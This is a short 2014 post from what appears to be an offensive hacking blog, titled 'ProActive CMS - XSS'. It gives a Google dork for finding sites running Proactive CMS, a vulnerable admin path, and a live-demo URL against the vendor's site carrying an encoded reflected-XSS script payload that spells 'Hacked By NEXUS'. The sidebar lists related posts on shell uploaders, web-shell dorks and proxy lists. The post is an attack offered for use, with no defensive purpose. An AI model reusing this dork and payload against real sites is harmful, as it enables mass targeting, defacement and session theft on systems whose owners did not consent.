Welcome To My Blog!!

Saturday, July 19, 2014

ProActive CMS - XSS



Dork:

intext:"Powered by Proactive CMS"


Exploit:

/admin.php?action=newuser (XSS)


Live Demo:

http://www.proactivecms.com/admin.php?action=newuser%22%3E%3Cscript%3Ealert%28String.fromCharCode%2872,%2097,%2067,%20107,%20101,%20100,%2032,%2066,%20121,%2032,%2078,%2069,%2088,%2085,%2083,%2032,%2033%29%29;%3C/script%3E
at 8:45 PM
Email ThisBlogThis!Share to XShare to FacebookShare to Pinterest

No comments:

Post a Comment

Newer Post Older Post Home
Subscribe to: Post Comments (Atom)

Total Pageviews

About Me

MKong4
View my complete profile

Blog Archive

  • ▼  2014 (75)
    • ▼  July (22)
      • 1-Footholds*Google search: intitle:"WSO 2.4" [ Sec...
      • Lan Hack With dSploit On Android
      • SQL 2014 DORK
      • Exploit Joomla!: JCE
      • Exploit WordPress: Optin Pro - File Upload Vulnera...
      • Espacio Ecuador XSS & SQLI
      • Pej Studio & Nissi Infotech & Plante Graffix - XSS
      • MyBB Kingchat - XSS
      • Pro-Service - XSS Vulnerability
      • Joomla Aclassif - XSS
      • Joomla Collector Shell Uploader
      • ProActive CMS - XSS
      • Noname - Media - XSS
      • Cách xử lí khi lỡ quên mật khẩu router
      • Sock 5 Vip!! (9/7/2014)
      • Sock 5 Vip!! (7/7/2014)
      • Sock 5 Vip!! (6/7/2014)
      • Sock 5 Vip!! (4/7/2014)
      • MachForm Remote Shell Upload
      • Namo WebEditor v5.0 Remote File Uploader
      • Sock 5 Vip!! (1/7/2014)
      • [ADD ONS] Hacker ToolKit For Google Chrome
    • ►  June (53)
Awesome Inc. theme. Theme images by RBFried. Powered by Blogger.